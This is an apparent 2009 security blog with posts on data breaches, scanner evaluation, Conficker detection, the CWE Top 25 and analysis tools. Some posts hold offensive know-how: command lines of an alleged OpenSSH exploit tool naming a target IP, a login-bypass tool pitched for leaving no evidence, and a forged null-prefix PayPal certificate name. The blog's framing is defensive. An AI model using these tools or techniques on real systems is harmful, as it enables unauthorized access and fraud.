I see this website as a great compliment to SecurityDocs which is the largest repository of information security documents on the web. So just don't check it out, get involved, and send the SecurityCrunch information to all of your friends and colleagues in the information security field!

Cyberthieves find workplace networks are easy pickings

2009-10-09T21:31:00.000-07:00

"It took only a modicum of skill for a cybergang to steal 94 million credit and debit card payment records from the TJX retail chain — and follow that up by hauling in 130 million records from credit card processor Heartland Payment Systems. Court records reveal that those record-setting break-ins were almost too easy. Even more surprising: The thieves were able to take their sweet time extracting the data, in each case going undetected for more than a year.", as reported in an USAToday article.

Does this surprise any experienced security professional? Most successful penetration tests that I have been involved with did not take any elite or specialized skills to gain unauthorized access to systems or data. On many occasions, my testing and exploit activities went undetected. Through my bot hunting research efforts, I am always surprised when I see a botnet scanning for OLD vulnerabilities and then see it successfully find a victim machine!

"What happened to TJX and Heartland was not unusual. And details unveiled in the prosecution of gang members involved in both thefts have shed fresh light on a business truism demanding more scrutiny: Workplace networks have turned out to be much more porous and difficult to defend than anyone ever anticipated."

I understand that the media can overstate and sensationalize the events that they report on but I found this statement not to far from the truth. Most environments I have seen have the typical "eggshell" security model in place (hard outer shell but a soft runny middle. Once the shell is breached the game is essentially over). A security architecture using a multi-layer-security or defense-in-depth security strategy (there is a difference between these two) was missing.

In one engagement, the CIO gathered all of the IT management and asked the question, "OK, we were successfully broken into. So, what do we need to buy to prevent this in the future?' The sad part is, this organization had all of the latest technology but failed to design and implement the technology correctly, failed to have security policies and processes, and failed to properly train their IT staff.

So, where do we begin? It is time to get back to basics and take a programmatic strategic approach to security in the enterprise! No one "box" or "solution" will solve our current security problems.

Web Application Security Scanner Evaluation Criteria

2009-10-08T22:01:00.000-07:00

Evaluating web application scanners can be challenging if you have not been involved with conducting a web application security assessment. I received the following notice today about a new project from the Web Application Security Consortium.

"The Web Application Security Consortium is pleased to announce the release of version 1 of the Web Application Security Scanner Evaluation Criteria (WASSEC). The goal of the WASSEC project is to create a vendor-neutral document to help guide information security professionals during web application scanner evaluations. The document provides a comprehensive list of features that should be considered when conducting an evaluation. The WASSEC project does not promote any specific products or tools, but instead provides valuable information to help you make your own decision about which of these tools best meets your needs."

The WASSEC document be found here in both wiki and PDF formats:
Web-Application-Security-Scanner-Evaluation-Criteria

The document provides the following list of features that should be considered when conducting a web application security scanner evaluation.

Categories

Section 1 - Protocol Support
Section 2 - Authentication
Section 3 - Session Management
Section 4 - Crawling
Section 5 - Parsing
Section 6 - Testing
Section 7 - Command and Control
Section 8 - Reporting
Advice for Conducting a Scanner Evaluation

Bogus PayPal SSL Certificate

2009-10-07T12:24:00.000-07:00

At the 2009 BlackHat conference in Las Vegas, a researcher revealed a X.509 Certificate Authority (CA) Common Name Null Byte Handling SSL MiTM Weakness that impacted the IE, Chrome, and Safari web browsers. A couple of months later, it is being reported that a hacker has published a counterfeit secure sockets layer certificate that exploits a gaping hole in a Microsoft library used by all three of those browsers.

"Monday's release of the so-called null-prefix certificate for PayPal is a serious blow to online security because it makes it trivial for cybercrooks to defeat one of the web's oldest and most relied upon defenses against man-in-the-middle attacks. PayPal and thousands of other financial websites use the certificates to generate a digital signature that mathematically proves login pages aren't forgeries that were set up by con artists who are sitting in between the user and the website he's trying to view. ... A PayPal spokeswoman said the company's information security team is aware of the fraudulent certificate. "We're working to see if there are any technical workarounds on the PayPal side which can be put into place," she said."

The certificate looks like this: www.paypal.com\0ssl.secureconnection.cc

The only way to protect yourself against this critical vulnerability, especially if you perform PayPal transactions, is to use versions 3.5 or 3.0.13 or later of Firefox until Microsoft fixes the weakness in their CryptoAPI.

VAST - VIPER Assessment Security Tools

2009-10-07T10:27:00.000-07:00

A new Live CD has been released that is focusing on VoIP security. I have used the VOIPSA security tool resource for specific VoIP testing tools.

"VAST is a VIPER Lab live distribution that contains VIPER developed tools such as UCsniff, videojak, videosnarf and more. Along with VIPER tools and other essential VoIP security tools, it also contains tools penetration testers utilize such as Metasploit, Nmap, and Hydra.This distribution is a work in progress. If you would like to see a tool or package included please feel free to suggest them and I will do what I can to make it happen. VAST also has built into synaptic package manager a third party repository link for the VIPER tools, so when we update a tool it's as easy as "apt-get"."

Know Your Tool Example

2009-10-05T12:42:00.000-07:00

In the past, I have blogged about the importance of knowing the tools you use for security testing. A lot of tools will interpret results for you and it is important to know when that happens. One of the main reasons why I like using Scapy for specific testing. Additionally, I also like watching the testing activity, using a packet analyzer, to validate how the targeted system is responding.

I have a system that continuously scans a network for system, port, and application identification. It is essentially a web application that manages NMAP data in a database. It identifies hosts on the network and performs full port scans against the hosts. When a new host or existing host change is identified, I get an email about the it. I have found this system extremely valuable in so many ways!!

Recently, I noticed 40,000 new hosts in the database that were discovered through a Host Identification NMAP scan. Problem is, these hosts did not exist and scans for 65,535 ports were being performed against all of these "ghost" systems.

Nice thing about the portwatch system is it places a time and date stamp when the host was first identified. Guess what?!? All of these "ghost" systems were all identified on the same date using ping and no ports were discovered (duh!). Hmmmm, interesting!

I made sure I was running the latest version of NMAP and tried a standard scan against one of the identified hosts. Same results. I tried again but using the --packet-trace flag and saw TTL (Time To Live) Expired errors. What?!? Long story short, a network change had been made that created a default route for EVERYTHING, that did not have an explicit route, to the Internet. The external router saw everything destined to an internal IP address but the internal router kept sending it back out, hence the TTL expiration.

Back to the reason for the post. NMAP was interpreting the TTL expired packet as a response from a "live" host at the IP address that was being probed when the TTL error was coming from a network device. I have done some research on this and have not seen where anyone else had experienced this issue.

Network configuration fixed, lesson learned, and now off to clean out 40,000 hosts from my scan database!

Free Anti-virus from Microsoft

2009-09-30T06:32:00.001-07:00

" Microsoft Security Essentials (formerly codenamed “Morro”) is the newest security product from Microsoft that helps protect consumers against viruses, spyware and other malicious software. The program, using the same technology as the Forefront product family, is designed to protect and take the guess work out of you wondering if you are protected or not.

If you’re green, you’re good.

Red or yellow means there is something that needs to be done to keep your PC secure. A single click and the PC is back to the green protected state.

Microsoft Security Essentials is also designed to address cost and other barriers that have prevented many of our customers from running up-to-date security protection on their PCs. Because there are no subscription fees, there is no registration required to collect billing or other personal information

It also runs quietly in the background scheduling scans when the PC is most likely idle and interrupting the user only when there is an action required to keep their PC secure. It employs practices like active memory swapping and CPU throttling to limit the impact on your PC performance, even on older or less powerful PCs.

This isn’t a security suite product that provides rich PC tuning capabilities or backs up your data. But if what you’re looking for is “install and forget” malware protection and solid quality Microsoft Security Essentials may be just what you’ve been waiting for. Plus, as a user of Microsoft Security Essentials you’ll get support from the MMPC.

We think you’re gonna like what you get with Microsoft Security Essentials. See for yourself and download it now!

Microsoft Security Essentials is available now in 8 languages and 19 markets around the world for genuine Windows PCs.

Download at: http://www.microsoft.com/security_essentials."

2009-09-28T09:21:00.000-07:00

Has your company cut back on travel and training budgets to make it difficult, if not impossible, to attend a security conference? SecurityTubeCon is a timely and promising idea that may give you access to the latest and greatest security research in a conference style format.

"SecurityTubeCon is aimed at democratizing hacker conferences by allowing any researcher, regardless of his physical location, to share his work with the community. Unlike other Cons we will not *accept / reject* speakers. If you have something interesting to share, you WILL be heard. The idea behind SecurityTubeCon is not to pass judgments on your work, instead, it aims at providing a platform for knowledge exchange."

CFP for SecurityTubeCon will be coming to a close on 10/10/09. By the week of the 12th, we will get a better idea of how successful this project will be. I hope it is and encourage all security researchers to be involved!

SecurityTubeCon Deadlines:
1. Deadline to Submit Abstracts: October 10th, 2009
2. Deadline to submit the full presentation and video: October 20th, 2009
3. Conference Dates: 6th, 7th and 8th November

Metasploit Unleashed - Mastering the Framework

2009-09-15T13:20:00.001-07:00

Metasploit Unleashed is now open. Have you been looking for a good resource to learn and use metasploit? This is the place to be.

"This free information security training is brought to you in a community effort to promote awareness and raise funds for underprivileged children in East Africa. Through a heart-warming effort by several security professionals, we are proud to present the most complete and in-depth open course about the Metasploit Framework."

FISMApedia

2009-09-04T08:14:00.000-07:00

Wanting to learn more about the Federal Information Security Management Act (FISMA)? Here is a good resource.

"FISMApedia is a collection of documents and discussions focused on Federal IT security. This site is a database of current guidance, laws and directives on how the Federal government secures its IT assets."

For example, I recently used it to see the differences between SP-800-53r2 and SP-800-53r3.

Lacking Security Skillz

2009-07-22T20:14:00.000-07:00

Booz | Allen | Hamilton, through the Partnership for Public Service, recently released an article titled, "Cyber IN-SECURITY, Strengthening the Federal Cybersecurity Workforce".

The executive summary highlighted the following key findings from the study:

The pipeline of potential new talent is inadequate.
Fragmented governance and uncoordinated leadership hinders the ability to meet federal cybersecurity workforce needs.
Complicated processes and rules hamper recruiting and retention efforts.
There is a disconnect between front-line hiring managers and government’s HR specialists.

"With most Americans, it would hardly set off alarms to hear that our federal workforce faces significant challenges, such as difficulty in recruiting and retaining highly skilled workers, a reliance on contractors to fill talent gaps, poor management and arcane processes that undermine employee performance, and a lack of coordination that leaves some agencies competing against one another for talent."

Now, if you have been around for awhile, this is old news. One of the benefits of being a contractor is being able to see how security is planned, implemented, and managed within many different environments. I have been in both the private and public sectors and neither one is immune to the issues that have been highlighted in the above statement. As stated by many friends who are consultants, "Same issues just a different company name!"

Defense Secretary Robert Gates has stated that the Pentagon is “desperately short of people who have [defensive and offensive cyber war skills] in all the services and we have to address it.”

There are many ways for a person wanting to improve and learn new security defensive and offensive skills. One way is to get involved in the US Cyber Challenge.

"The US Cyber Challenge is looking for 10,000 young Americans with the skills to fill the ranks of cyber security practitioners, researchers, and warriors. Some will become the top guns in cyber security. The program will nurture and develop their skills, give them access to advanced education and exercises, and where appropriate, enable them to be recognized by colleges and employers where their skills can be of the greatest value to the nation."

Another way is to get involved with your local security user group that focuses on skill development (i.e., OWASP or a Defcon User Group). This is not to discourage you from the ISSA or ISACA meetings. My experience with these groups involved social networking and listening to vendors give their product and service pitches.

I have had a great experience with the DC303 group and have been able to learn many things from the talented security people in Denver. This group has competed several times in the annual Defcon Capture the Flag competition and continue to improve their computer defensive and offensive skills through controlled and collaborative meetings! It has been said that one of the advantages that the "Black Hat" culture has on the "White Hat" culture is collaboration, communication, and mentorship. These types of groups provide the same benefits without being unethical.

Over the next few weeks, I will continue this topic as I document some of the resources that I use on a daily, weekly, and monthly basis for my constant and never ending improvement of my information security skills.

OpenSSH Exploit Alert

2009-07-08T11:10:00.001-07:00

A lot of talk has been taking place about an underground openssh exploit. It appears to be linked to the following exploit tools:

“./0pen0wn” or “./0penPWN” by the hacker group called “anti-sec.”

anti-sec:~/pwn/xpl# ./openPWN -h  -p 22 -l=users.txt

 [+] openPWN - anti-sec group
[+] Target: 
[+] SSH Port: 22
[+] List: users.txt

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

and:

anti-sec: ~ / pwn / xpl # ./0pen0wn-h  -p 22

[+] 0wn0wn – anti-sec group [+] 0wn0wn - anti-sec group
[+] Target: 66.197.143.133 [+] Target: 
[+] SSH Port: 22 [+] SSH Port: 22

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

One website reported a log of the attack that can be found here. There is a lot of discussion of whether this is real or not. It is recommended to make sure that your openssh is at the current version, using a secure configuration, and that your are monitoring the activity against your systems until more information is released on this issue.

Kon-Boot: Bypass Windows/Linux Login

2009-05-26T21:33:00.000-07:00

I have used the Offline NT Password & Registry Editor tool to gain administrative access on systems for various reasons (i.e., forgot password, penetration testing, forensic investigation, etc). Sometimes, especially during a penetration test, you need to gain access without leaving evidence that you were there. You cannot use this tool without someone knowing that their password has been changed. I just came across a tool that allows you to gain access to a system using any password!

"Kon-Boot for Windows enables logging in to any password protected machine profile without without any knowledge of the password. This tool changes the contents of Windows kernel while booting, everything is done virtually - without any interferences with physical system changes."

Operating Systems Affected
Windows Server 2008 Standard SP2 (v.275)
Windows Vista Business SP0
Windows Vista Ultimate SP1
Windows Vista Ultimate SP0
Windows Server 2003 Enterprise
Windows XP
Windows XP SP1
Windows XP SP2
Windows XP SP3
Windows 7
Gentoo 2.6.24-gentoo-r5 (GRUB 0.97)
Ubuntu 2.6.24.3-debug (GRUB 0.97)
Debian 2.6.18-6-686 (GRUB 0.97)
Fedora 2.6.25.9-76.fc9.i686 (GRUB 0.97)

To get started, download the ISO or floppy image and just reboot the system. When prompted for a password, pick anything and you’re in!!!

Floppy Image DOWNLOAD
ISO Image DOWNLOAD

Watcher - Web Testing and Compliance Tool

2009-04-21T20:35:00.001-07:00

I have written in the past on the topic of having a testing toolkit and knowing what the tools do as well as when to use them. Most of my work and research lately has been on application security. There are many great tools for testing web applications. I came across a new tool called Watcher that has been getting a lot of attention and is a tool that I have been using a lot lately.

Watcher is a plugin for the Fiddler HTTP debugging proxy with the following features:

Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, and CSS
Works seamlessly with complex Web 2.0 applications while you drive the Web browser
Non-intrusive, will not raise alarms or damage production sites
Real-time analysis and reporting - findings are reported as they’re found, exportable to XML
Configurable domains with wildcard support
Extensible framework for adding new checks

Unlike most security testing tools that intrusively probe an application for vulnerabilities and weaknesses, Watcher does all of the security checks in the background, silently, while you browse through an application.

Over 30 checks are included in the framework:

Cross-domain stylesheet and javascript references
User-controllable cross-domain references
User-controllable attribute values such as href, form action, etc.
User-controllable javascript events (e.g. onclick)
Cross-domain form POSTs
Insecure cookies which don't set the HTTPOnly or secure flags
Open redirects which can be abused by spammers and phishers
Insecure Flash object parameters useful for cross-site scripting
Insecure Flash crossdomain.xml
Insecure Silverlight clientaccesspolicy.xml
Charset declarations which could introduce vulnerability (non-UTF-8)
User-controllable charset declarations
Dangerous context-switching between HTTP and HTTPS
Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
Potential HTTP referer leaks of sensitive user-information
Potential information leaks in URL parameters
Source code comments worth a closer look
Insecure authentication protocols like Digest and Basic
SSL certificate validation errors
SSL insecure protocol issues (allowing SSL v2)
Unicode issues with invalid byte streams
Sharepoint insecurity checks
more….

Keep an eye on this tool as the Microsoft SDL team is excited about it and they are looking at incorporating Watcher in a future version of the Microsoft SDL.

Conficker Testing

2009-04-02T10:40:00.001-07:00

Up till today, all of the automated checks for conficker have been network based (SCS, nmap, Nessus). Continued research with the tools highlighted that the scanning techniques used was not detecting all infected hosts and had the risk of crashing systems using one of the scanning tools.

Today, Tenable released an update to their conficker plugin (#36036) that now uses credentials to log into a host and scan the local system for the presence of the Conficker virus. This type of check provides a higher level of assurance for detecting infected systems and is much safer than the previous ways of checking.

If you have access to the Tenable ProfessionalFeed and HomeFeed, I highly encourage the use of this new plugin to check your environment!

Conficker - April Fools?!?!

2009-04-01T07:10:00.000-07:00

Today is the big day, right? Or is today a joke on us from the author of conficker? You would think that a person with malicious intent would not want to make an update to their software on the day that everyone is watching!

On another note, if you are using nmap to detect infected systems within your environment, you may need to update the script.

I downloaded the beta version of nmap (nmap-4.85BETA5.tar.bz2) when it was first released. Every system probed (over several thousand systems) for conficker was being marked as "Likely INFECTED"!!! This did not seem right. Using the "Trust But Verify" approach, I used the Simple Conficker Scanner against a number of the identified systems and it marked each system as "seems to be clean". Now what?!?!?!

I reviewed the smb-check-vulns script and their is a flaw with the script. Every system, by default, will get marked as "Likely INFECTED" instead of "Likely CLEAN" when found clean....errr....likely clean.

The script has been fixed and you should grab the latest script or update your nmap through the SVN depository.

Hidden USB Storage

2009-02-12T19:47:00.001-08:00

Gadgets are fun! While exploring through the Instructables website, I came across a hidden USB Storage idea using a USB stick and a standard phone jack.

While there are a lot of interesting ideas on Instructables, I prefer the Hack A Day for some really awesome technical projects. Back to the hidden USB storage idea.....

Building the device seen in the picture and by taking a standard USB cable, stripping the four wires, and then connecting those wires to either end of a telephone line jack and port, you’ve got a cool little connectivity solution.

Wepawet - Website Analysis Made Easy

2009-01-26T21:11:00.001-08:00

In December of 2008, I found a great tool called Wepawet, that I now use during my threat research. Wepawet stands for Web Engine to Protect from and Analyze Widespread and Emerging Threats. It is a collection of tools that use static and dynamic techniques to analyze web content to identify possible malicious behavior. It currently supports analyzing Adobe Flash and Javascript files.

Wepawet was created by the Computer Security Group at UCSB. I've had the pleasure of interacting with the students of this great program and have competed against their team at the several Defcon CTF competitions.

In the past, I have used Exploit Prevention Labs LinkScanner to find out if a URL was serving malicious code. While I was researching a new Waledac URL (seocom.mobi), I found the Wepawet analysis of this site and all of its "evilness". The website was serving up eleven (11) exploits for various vulnerabilities.

Check out the output of this tool and use it. I have found it to be very valuable!

25 Most Dangerous Programming Errors - How to Fix Them

2009-01-13T15:08:00.000-08:00

Security professionals usually find themselves playing multiple roles within the organization they are working with or for. I often find myself working with programmers, as the result of my testing findings from a web application assessment, explaining each issue and how to fix them. I have received a variety of responses ranging from, "Yeah, I know how to do that....I just didn't do it" to "Wow, that is cool! I never knew that."

Usually, I find myself directing web application developers to OWASP as a resource on how to create secure code. Recently, I reviewed a report, "Fundamental Practices for Secure Software Development", from The Software Assurance Forum for Excellence in Code (SAFECode).

"A key goal of this paper is to keep it short, pragmatic and highly actionable. It prescribes specific security practices at each stage of the development process — Requirements, Design, Programming, Testing, Code Handling and Documentation — that can be implemented across diverse development environments."

I found that the recommended practices from the report were good yet have been repeatedly written about. Why do we continue to see the same known flaws and weaknesses in new applications?

An effort coordinated by non-profit research groups The SANS Institute and MITRE, experts from more than thirty US and international cyber security organizations jointly released a list of the 25 most common mistakes in applications that lead to security incidents that could give some light to this problem.

"Most of these errors are not well understood by programmers; their avoidance is not widely taught by computer science programs; and their presence is frequently not tested by organizations developing software for sale," according to a statement from the group. "Just two of them led to more than 1.5 million web site security breaches during 2008, and those breaches cascaded onto the computers of people who visited those web sites, turning their computers into zombies."

The list has grouped the top programming errors into three categories:

CATEGORY: Insecure Interaction Between Components
* CWE-20: Improper Input Validation
* CWE-116: Improper Encoding or Escaping of Output
* CWE-89: Failure to Preserve SQL Query Structure
* CWE-79: Failure to Preserve Web Page Structure
* CWE-78: Failure to Preserve OS Command Structure
* CWE-319: Cleartext Transmission of Sensitive Information
* CWE-352: Cross-Site Request Forgery (CSRF)
* CWE-362: Race Condition
* CWE-209: Error Message Information Leak

CATEGORY: Risky Resource Management
* CWE-119: Failure to Constrain Operations within the Bounds of a Memory Buffer
* CWE-642: External Control of Critical State Data
* CWE-73: External Control of File Name or Path
* CWE-426: Untrusted Search Path
* CWE-94: Failure to Control Generation of Code
* CWE-494: Download of Code Without Integrity Check
* CWE-404: Improper Resource Shutdown or Release
* CWE-665: Improper Initialization
* CWE-682: Incorrect Calculation

CATEGORY: Porous Defenses
* CWE-285: Improper Access Control
* CWE-327: Use of a Broken or Risky Cryptographic Algorithm
* CWE-259: Hard-Coded Password
* CWE-732: Insecure Permission Assignment for Critical Resource
* CWE-330: Use of Insufficiently Random Values
* CWE-250: Execution with Unnecessary Privileges
* CWE-602: Client-Side Enforcement of Server-Side Security

"The group said the list puts the focus now on actual programming errors made in the process of developing software, rather than the vulnerabilities that result from programming errors."

What a concept! I highly recommend organizations use the Top 25 Programming errors information to focus their secure coding training and awareness efforts as well as their web application assessments.

Police hacking of home PCs!

2009-01-06T08:11:00.000-08:00

According to the London Times, police and intelligence agencies from French, German and other EU forces may soon be working together to secretly hack into private citizens' personal computers without their knowledge and without a warrant.

"A remote search can be granted if a senior officer says he “believes” that it is “proportionate” and necessary to prevent or detect serious crime — defined as any offense attracting a jail sentence of more than three years."

"Dominic Grieve, the shadow home secretary, agreed that the development may benefit law enforcement. But he added: “The exercise of such intrusive powers raises serious privacy issues. The government must explain how they would work in practice and what safeguards will be in place to prevent abuse.”"

British law already allows police to remotely access computers under the Regulation of Investigatory Powers Act 2000, which allows surveillance to "prevent or detect serious crime".

"Civil libertarians are calling on Parliament to enact legislation to require warrants and oversight of the program. "

This should be interesting to watch from a privacy perspective as well as a forensic perspective. Keeping the integrity of the data on a system is vital in a forensics investigation. Changes to a system can usually be impossible to detect unless other measures have been taken. I spoke at a conference in Brazinl and met Andrew Sheldon of EvidenceTalks. He sells a remote forensics solution and is located in the UK. Interesting!!! I will have to talk with him more about this.

The article describes using keylogger devices, wireless networks, and sending an email to the suspect with a malicious attachment as several ways to gain access to the system.

"Police say that such methods are necessary to investigate suspects who use cyberspace to carry out crimes. These include paedophiles, internet fraudsters, identity thieves and terrorists."

Seamless data transfer among various electronic devices in 2009

2009-01-05T20:24:00.000-08:00

A recession doesn't mean the death of innovation in the consumer tech industry. Consider 2001. During that recession, Apple Inc. introduced the iPod, Microsoft Corp. rolled out its original Xbox video game console, broadband household penetration rates in the U.S. more than doubled from 2000, and Google Inc. was becoming an integral part of modern life.

The pace of innovation isn't likely to falter in this recession, either.

John Donovan, chief technology officer at Dallas-based AT&T Inc., said consumer technology changes so fast that any company that tries to pause is likely to be overrun by its competitors.

"In tough times, I think what happens is you sort of shorten your horizons and raise your bars slightly to make sure that you remain focused and coordinated," he said.

"But you can't abandon the evolution that is such a natural part of the technology. We're not building real estate that lasts 100 years. We're building tangible things, but they transform at a very rapid cycle."

Donovan said that AT&T in 2009 plans to focus on how customers interact with their various electronic devices, letting users seamlessly transfer data among televisions, smart phones and computers all on the same home network.

Check your e-mail on the TV, forward a link to your iPhone of a map embedded in one of those e-mails, and then, while on the road, view a live video feed from a highway camera to see what traffic looks like up ahead.

"Much of that stuff I just described comes together in 2009," Donovan said.

This type of innovation is exciting and cool yet highlights the increasing need for privacy and security within the home environment.

Private Medical Records Found In Garbage Sent To TV Station

2009-01-05T14:55:00.000-08:00

Believe it or not, this happens all of the time! I have been involved with numerous penetration tests and assessments where our team was able to recover sensitive data from the dumpster. In one incident the client placed a standard lock on their dumpster, which was located in a public alley, as a "mitigation" strategy. As you can guess, it took a matter of 10 seconds to pick the lock!

I read that starting in January, Medicare and Medicaid will pay more to doctors who embrace certain technological improvements that will reduce medical errors and administrative costs. Electronic prescription systems will be among the first technologies the government pushes. Doctors who use such systems will get a 2 percent bonus from the government. Starting in 2012, those who refuse will get penalized.

A story in Marketwatch said:
"Creating a culture of privacy, security and compliance is a rising priority for healthcare organizations as the Health and Human Services Office of Inspector General (HHS OIG) conducted unannounced HIPAA audits during 2007 and 2008. Additionally, FTC Identity Theft Red Flag rules were expanded to include healthcare providers. Industry insiders believe that the incoming federal administration sees healthcare privacy as a cornerstone to furthering the deployment of electronic health records. "

If this is true and Medicare/Medicaid is offering business incentives to go paperless, we may see more HIPAA enforcement in the year 2009!

Zero Wine: Malware Behavior Analysis

2008-12-30T14:23:00.000-08:00

Zero wine is an open source (GPL v2) research project to dynamically analyze the behavior of malware. Zero wine runs the malware using WINE in a safe virtual sandbox (in an isolated environment) collecting information about the APIs called by the program.

The output generated by wine (using the debug environment variable WINEDEBUG) are the API calls used by the malware (and the values used by it, of course).

Zero wine is distributed as one QEMU virtual machine image with a Debian operating system installed.

Project Website